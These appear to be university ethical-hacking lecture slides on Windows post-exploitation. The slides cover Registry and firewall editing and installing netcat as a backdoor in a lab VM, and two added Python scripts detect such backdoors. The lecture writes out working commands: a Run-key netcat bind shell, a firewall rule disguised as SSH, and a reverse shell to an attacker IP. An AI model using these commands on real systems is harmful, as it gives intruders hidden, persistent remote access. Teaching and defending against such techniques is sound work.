Lecture09A-Post-Exploitation-Part2

This lecture covers post-exploitation techniques in ethical hacking, focusing on modifying the Windows Registry and Firewall to install backdoors. It explains the structure of the Windows Registry, how to edit keys and values, and the use of the netcat program as a backdoor. Additionally, it discusses methods for connecting to and removing backdoors, emphasizing the importance of stealth in hacking practices.

INFO3002 Ethical Hacking Principles and Practice

Lecture 9A: Post Exploitation Part 2

School of Computer, Data and Mathematical Sciences


Western Sydney University
1
Where we are:

1: Reconnaissance
2: Scanning
3: Exploitation
4: Post Exploitation
5: Writing Report
2
Lecture outline

Installing backdoors often involves changing Windows Registry and firewall settings, so we talk about these two topics first, and then move on to backdoor installation.

■ Changing Windows Registry
■ Changing Windows Firewall Settings
■ Installing backdoors

3
Windows Registry Overview
■ A hierarchical database that stores settings for:
▬ The Microsoft Windows operating system
▬ The applications that opt to use the Registry.
■ Contains two basic elements: key and value.
▬ Key: a container of values, similar to the concept of a folder in a file system.
▬ Value: an object that stores one piece of configuration information, similar to the concept of a file in a file system.

Reference: https://en.wikipedia.org/wiki/Windows_Registry

4
Registry Keys
■ Keys are named similarly to Windows paths, using backslashes to indicate levels of hierarchy.
▬ E.g., HKEY_LOCAL_MACHINE\Software\Microsoft\Windows refers to the subkey "Windows" of the subkey "Microsoft" of the subkey "Software" of the HKEY_LOCAL_MACHINE root key.
■ There are the following five visible root keys:
▬ HKEY_LOCAL_MACHINE or HKLM
▬ HKEY_CURRENT_CONFIG or HKCC
▬ HKEY_CLASSES_ROOT or HKCR
▬ HKEY_CURRENT_USER or HKCU
▬ HKEY_USERS or HKU

5
Registry Values
■ Values are name and data pairs.
■ Values are referenced by their names.
▬ Each value has a unique name inside its containing key.
■ The data of a value can store arbitrary information and is associated with a type.
■ There are 12 standard types for data. Below, we only list the common three:
▬ REG_SZ: A string type.
▬ REG_BINARY: Arbitrary data; can be anything.
▬ REG_DWORD: 32-bit unsigned integer.

6
Notes on Keys and Values
■ The terms used in the Windows Registry are confusing, because in standard computer-science terminology, e.g., in an associative array (i.e., a dictionary), keys are the indices for the associated values.
■ However, in the Windows Registry, keys are a concept similar to folders, and values are a concept similar to objects or files, with each value itself consisting of a (name, data) pair.

7
Editing Keys and Values
■ GUI: regedit.exe
■ Command line: reg.exe
▬ The command line is very important, as hackers usually only get command line access.
■ Reg.exe is easy to learn. To get help, you can type:
▬ REG /?
▬ REG QUERY /?
▬ REG ADD /?
▬ REG DELETE /?

8
Run Command Prompt as Administrator
■ To run Windows Registry command lines, you need to run the Command Prompt as Administrator.
■ Click Windows Start → Programs → Accessories → Command Prompt → Run as administrator

9
Reg Command Examples
■ Query what's inside a key:
▬ reg query HKLM\software\microsoft\windows\currentversion\run
▬ This key contains the programs that will be automatically started when the system boots.
■ Add a value inside a key:
▬ reg add HKLM\software\microsoft\windows\currentversion\run /v nc /d "C:\bin\nc.exe -Ldp 22 -e cmd.exe"
▬ NB: The full path must be used for the program to start: C:\bin\nc.exe
■ Delete a value inside a key:
▬ reg delete HKLM\software\microsoft\windows\currentversion\run /v nc

10
Lecture outline
■ Changing Windows Registry
■ Changing Windows Firewall Settings
■ Installing backdoors

11
A note in the beginning
■ A computer typically has a third-party firewall installed other than Windows Firewall.
■ A third-party firewall has a command line interface for configuration as well.
■ By learning how to modify the Windows Firewall configuration, you can apply similar techniques to the configurations of other firewalls.

12
Windows Firewall Overview
■ Windows Firewall is a built-in component of Microsoft
Windows that provides packet filtering functions.
■ It also has logging functionality that can record connection
information into a log file.

Reference: https://en.wikipedia.org/wiki/Windows_Firewall

13
Profiles in Windows Firewall
■ For each network interface on a computer, Windows
Firewall can apply one of the following three profiles:
▬ Public: assumes that the network is shared with the
World and is the most restrictive profile.
▬ Private (home/work): assumes that the network is
protected from the Internet and allows more inbound
connections than public.
▬ Domain: is the least restrictive. It allows more inbound
connections to enable file sharing, etc.

14
Changing Windows Firewall Settings
■ GUI: Search "Windows Firewall", then run it
■ Command line:
▬ netsh firewall for WinXP
▬ netsh advfirewall for Win7 and later
■ To learn how to use netsh advfirewall, you can do:
▬ netsh advfirewall /? for general firewall settings
▬ netsh advfirewall firewall /? for firewall rules

15
Run Command Window as Administrator
■ To run Windows Firewall command lines, you need to run the Command Prompt as Administrator.
■ Click Windows Start → Programs → Accessories → Command Prompt → Run as administrator

16
Turn on/off firewalls
■ To turn off the firewall (this is sometimes needed in post exploitation, but it is too aggressive):
▬ netsh advfirewall set allprofiles state off
■ To turn on the firewall:
▬ netsh advfirewall set allprofiles state on
■ To show the firewall status:
▬ netsh advfirewall show allprofiles

17
Show current firewall rules
■ Get usage: netsh advfirewall firewall show rule ?

18
Show current firewall rules – Examples
■ Show all rules:
▬ netsh advfirewall firewall show rule name=all | more
■ Show a single rule by specifying its name:
▬ netsh advfirewall firewall show rule name="Telnet Server"

19
Add a new firewall rule
■ Get usage: netsh advfirewall firewall add rule ?
▬ NB: An optional argument (inside square brackets) can be
omitted. If omitted, the default is 'any' unless
specified otherwise.

20
Add a new firewall rule – Example
■ Add an inbound rule allowing TCP port 22 traffic with the name "SSH"
▬ netsh advfirewall firewall add rule dir=in action=allow name="SSH" protocol=TCP localport=22
■ To confirm: netsh advfirewall firewall show rule name="SSH"

21
Delete all matching firewall rules
■ Get usage: netsh advfirewall firewall delete rule ?
▬ NB: usually we use the 'name' argument to specify a
single rule for deletion.

22
Delete firewall rules – Example
■ Delete the firewall rule named "SSH"
▬ netsh advfirewall firewall delete rule name="SSH"

■ To confirm: netsh advfirewall firewall show rule name="SSH"

23
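As an added example (not part of the lecture), here is the rule audit a defender would run after seeing the show/add/delete commands above: it parses the text that netsh advfirewall firewall show rule name=all prints and reports enabled inbound allow rules that are not in an assumed baseline, which is how a rule such as "SSH" on port 22 that does not belong to any installed service stands out. The sample netsh output and the baseline set are constructed.

```python
# Constructed sample of what "netsh advfirewall firewall show rule name=all" prints,
# reduced to the fields the check reads; the "SSH" rule is the kind of inbound allow
# that a netcat listener on port 22 needs in order to be reachable.
SAMPLE_NETSH_OUTPUT = """\
Rule Name:                            File and Printer Sharing (SMB-In)
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            445
Action:                               Allow

Rule Name:                            SSH
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            In
Protocol:                             TCP
LocalPort:                            22
Action:                               Allow
"""

# Assumed baseline of inbound allows that belong on this host, keyed by
# (name, protocol, port) so a rule that borrows a trusted name still stands out.
BASELINE = {("File and Printer Sharing (SMB-In)", "TCP", "445")}

def parse_rules(text: str) -> list[dict[str, str]]:
    """Turn netsh's 'Field:   value' blocks into one dict per rule."""
    rules: list[dict[str, str]] = []
    for line in text.splitlines():
        if ":" not in line or line.startswith("-"):
            continue                           # blank line or separator
        field, _, value = line.partition(":")
        field, value = field.strip(), value.strip()
        if field == "Rule Name":               # each rule block starts with its name
            rules.append({})
        if rules:
            rules[-1][field] = value
    return rules

def unexpected_inbound_allows(text: str, baseline=BASELINE) -> list[tuple[str, str, str]]:
    """Enabled inbound allow rules outside the baseline: the first place to look
    for a hole opened so that a listener such as a netcat backdoor is reachable."""
    found = []
    for r in parse_rules(text):
        key = (r.get("Rule Name", ""), r.get("Protocol", ""), r.get("LocalPort", ""))
        if (r.get("Direction") == "In" and r.get("Action") == "Allow"
                and r.get("Enabled") == "Yes" and key not in baseline):
            found.append(key)
    return found
```

The same parser works on the output of show rule name="SSH", so the confirmation step above can be scripted rather than read by eye.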
Lecture outline
■ Editing Windows Registry
■ Editing Windows Firewall Settings
■ Installing Backdoors

24
Backdoor Overview
■ A backdoor is a secret service that allows hackers to
access a target repeatedly.
■ After hackers have exploited a target, a common activity is
to install a backdoor at the target, such that hackers will
not have to exploit the target again to get access.

25
Methods of installing backdoor
■ There are many methods for installing backdoors:
▬ MSF provides scripts for installing the Meterpreter payload as a backdoor. (However, the success rate is very low.)
▬ Install the netcat program as a backdoor.
▬ Develop your own programs as a backdoor.
■ This lecture will talk about the 2nd method above.

Hereafter, we'll assume that we have successfully obtained a Meterpreter session at the target.

26
Using the netcat program as backdoor
■ The Meterpreter payload will be detected by most anti-virus software as malware, so it is often better to use other programs as a backdoor.
■ 'netcat' can be such a choice.
▬ 'netcat' can bind itself to a shell at the target and relay the traffic between the shell and the attacker machine.
o Binding to a shell (e.g., cmd.exe) can be achieved by the '-e' option of netcat: nc -e cmd.exe
▬ Thus, 'netcat' can serve as a backdoor.
▬ The detailed steps are given in the coming slides.

27
Remarks for using netcat as backdoor
■ 'netcat' is not a good choice either, as many anti-virus products will quarantine 'netcat' as well.
■ Here we simply use it to demo how to use another program as a backdoor.
■ Professional hackers will typically develop their own backdoors.

28
Steps of installing netcat as backdoor
■ We'll give the steps of installing netcat as backdoor in our
Win7 VM in the ensuing slides.
■ Before carrying out these steps, we need to first obtain a
meterpreter session by exploiting the SMB vuln ms17-010
on Win7.
▬ Refer to Lecture 6 slides on how to achieve this.
▬ The obtained meterpreter session will be under the
account 'NT Authority/System', which gives us the
privilege to install the backdoor.

29
Step 1. Upload nc.exe to target.
(NB: In the Win7 VMs in the school cloud, we have saved 'nc.exe' in the 'C:\bin' directory for your convenience, so you don't need to do anything here. The step below is for the case that you created your own Win7 VM.)

■ You can use the Meterpreter 'upload' command to upload nc.exe to the C:\bin folder or any other folder in the target.
▬ Meterpreter> upload ./Downloads/nc.exe C:\\bin

Note: You need to use a double backslash to represent a single backslash in the file path for Windows files in Meterpreter.

30
Step 2. Add nc.exe to automatic startup
■ You can achieve this by editing the Windows Registry.
▬ NB: Meterpreter has a different command syntax for 'reg'.
• -L: listening, i.e., running in server mode and supporting repeated connections; '-l' only supports one connection.
• -d: running as a daemon, i.e., in the background.
• -p <port>: the port number to listen on; you should choose a port number not in use and not suspicious, say, 22. (Also: -Lpd 22 won't work.)
• -e <program>: execute the program and bind to it (i.e., relay the input/output to/from it). Moreover, the full path must be used for the program: C:\bin\nc.exe

31
Notes on Step 2
■ You can also run 'shell' under Meterpreter to enter a Windows shell, and then use a Windows command to achieve the same purpose, but the command syntax is slightly different. See below:
▬ reg add HKLM\software\microsoft\windows\currentversion\run /v nc /d "C:\bin\nc.exe -Ldp 22 -e cmd.exe"

32
Notes on Step 2 (cont'd)
■ You can check whether Step 2 is effective as below.

■ Or by Windows Command:

33
Step 3. Allow netcat in Windows Firewall
■ Run 'shell' in Meterpreter to invoke the Windows command prompt.
■ Then:
netsh advfirewall firewall add rule name="SSH" dir=in action=allow protocol=TCP localport=22

Disguise it as "SSH Service"

34
Notes on Step 3
■ You can check whether Step 3 is effective as follows.

It's there

35
Step 4. Connect to the backdoor
■ Reboot the target machine and log in.
▬ Without logging in, the nc in the registry won't be triggered.
▬ NB: If you log in to Win7 as 'Admin', you'll get an nc session with the 'Admin' account; if as 'Alex', then an nc session with the 'Alex' account.
■ Click 'Run' to allow the 'C:\bin\nc.exe' program.

36
Step 4. Connect to the backdoor (cont'd)
■ If you don't want this 'Security Warning' window to appear, you should copy nc.exe to the C:/Windows/System32 folder in a Meterpreter session, and then install C:/Windows/System32/nc.exe as a backdoor.
■ Windows trusts every application residing in this folder.
■ You can try this refined technique by yourself.

37
Step 4. Connect to the backdoor (cont'd)
■ At the attacker machine, run nc in client mode to connect to Win7 at port 22, and then you'll get a Windows shell:
▬ NB: the command 'whoami' is supported by Windows as well.

38
Netcat as backdoor: alternative method
■ In the previous method, the firewall setting needs modification to allow the attacker to connect to the netcat backdoor.
▬ This is not very stealthy.
■ The alternative method is to run 'nc' in client mode as the backdoor.
▬ This makes 'nc' connect to the attacker machine, which is mostly allowed by the firewall.

39
Netcat as backdoor: alternative method (cont'd)
The rough steps for this are as follows:

■ In Kali, run 'nc' in server mode at a well-known port. For example,
▬ sudo nc -vlp 22
■ Modify the Windows Registry of the target machine to automatically run 'nc' in client mode after the system boots and the user logs in. For example,
▬ reg add HKLM\software\microsoft\windows\currentversion\run /v nc /d "C:\bin\nc.exe -d -e cmd.exe Your-Kali-IP 22"
▬ Here, '-d' asks nc to run in daemon mode, i.e., background mode.

You'll be asked to try this in your lab work.

40
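The check that pairs with the reg query / reg add examples on slide 10 and with the netcat option notes in Step 2, as an added example that is not from the lecture: it parses the text that reg query prints for the Run key and, for each value, reads the nc-style options to report whether it is a listener (the Step 2 method) or a client connecting out (this alternative method). The sample reg output, the value names and the IP address are constructed, and the option reader also shows why the slides say -Lpd 22 won't work.

```python
import re
from typing import Optional
# Constructed sample of what "reg query HKLM\software\microsoft\windows\currentversion\run"
# prints; the two nc values mirror the bind-mode and client-mode backdoors in the slides.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\bin\nc.exe -Ldp 22 -e cmd.exe
    updater    REG_SZ    C:\bin\nc.exe -d -e cmd.exe 198.51.100.7 22
"""

def parse_reg_query(text: str) -> list[dict[str, str]]:
    """reg.exe prints each value as <4 spaces>name<4 spaces>type<4 spaces>data."""
    values = []
    for line in text.splitlines():
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)
        if line.startswith("    ") and len(parts) == 3:
            values.append(dict(zip(("name", "type", "data"), parts)))
    return values

def describe_nc_options(cmdline: str) -> Optional[str]:
    """Read netcat-style options (-l/-L listen, -d detach, -p port, -e program). Like
    getopt, an argument letter eats the rest of its cluster: "-Lpd 22" yields port "d"."""
    tokens = cmdline.split()[1:]               # drop the program path
    opts, positional, i = {}, [], 0
    while i < len(tokens):
        tok = tokens[i]
        if not (tok.startswith("-") and tok[1:].isalpha()):
            positional.append(tok)             # host / port for client mode
        else:
            for j, letter in enumerate(tok[1:]):
                if letter not in "pe":         # flag without an argument
                    opts[letter] = True
                    continue
                rest = tok[j + 2:]
                if not rest:                   # argument is the next token
                    i += 1
                    rest = tokens[i] if i < len(tokens) else ""
                opts[letter] = rest
                break
        i += 1
    if "e" not in opts:
        return None                            # nothing bound to a shell
    mode = (f"bind shell on port {opts.get('p', '?')}" if opts.keys() & {"l", "L"}
            else f"reverse shell to {':'.join(positional[:2])}")
    return f"{mode}, running {opts['e']}"

def flag_autoruns(text: str) -> list[str]:
    return [f"{v['name']} -> {d}" for v in parse_reg_query(text)
            if (d := describe_nc_options(v["data"]))]
```

Each line returned by flag_autoruns names the value to pass to reg delete /v, which is the removal step on the next slide.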
Netcat as backdoor: removing it
■ When a hacker no longer needs a backdoor, he/she can remove it by executing:
▬ reg delete HKLM\software\microsoft\windows\currentversion\run /v nc
▬ NB: for 'delete', including only the value name 'nc' is OK.
■ The hacker should also remove the netcat program from the C:\bin folder. But in our case, please keep the 'nc' there for later experiments.

41
Example Short Answer Question:
■ Explain the following concepts used in Windows Registry:
Key, Value.

42
References
■ Online Tutorial from Offensive Security: Metasploit Unleashed
▬ https://www.offensive-security.com/metasploit-unleashed/
■ The web links mentioned in the slides of this lecture

Big reminder:
• Lab 8 will be due next week. Since it is very long, consisting of tasks for this lecture and the last lecture, you should have already started it!
43
